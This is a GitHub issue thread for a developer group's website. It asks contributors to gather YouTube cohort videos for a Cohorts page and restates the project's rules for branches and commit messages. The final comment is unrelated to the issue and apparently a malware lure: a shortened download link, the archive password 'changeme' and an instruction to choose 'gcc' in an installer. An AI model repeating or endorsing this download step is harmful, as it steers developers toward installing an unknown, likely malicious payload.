### ISSUE TITLE
chore: Add video embeds for Cohorts page (WEB-54)

### ISSUE THREAD

**Issue by Dissurender** [dallassoftwaredevelopers/DSDsite#104]
## Task

Collect and fill data for cohort videos over the years.
- [ ] Retrieve video links from DSD youtube channel

[Figma Design](https://www.figma.com/design/8cpiqfhzCrzjqK7UOyJKvn/DSD?node-id=765-2102&t=t2Dyzc2ZTf6gbU8y-4)
![image](https://github.com/user-attachments/assets/86999570-0b1e-48ca-9fb5-f911587f46bc)

> Steps to contribute. NEVER COMMIT TO MAIN. NEVER COMMIT TO MAIN. It should always be on your own branch and that branch name should match the issue. Ensure that you are addressing the correct issue. Each issue will be listed as something like a chore, fix, bug, etc. Your commit message MUST start with one of these tags that correspond with your issue. Followed by your commit message and your commit message must end with the branch name, for example (WEB-1)
>
> An example commit message would look like this: chore: create contributing guidelines (WEB-8)
>
> Commit messages should not be written in an action or present tense. It also should not mention tasks unrelated to the issue "Creating Contributing Guidelines and will work on next task" is not what we would want to see as a commit message.
>
> After a pull request is approved, the branch should be deleted once merged.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
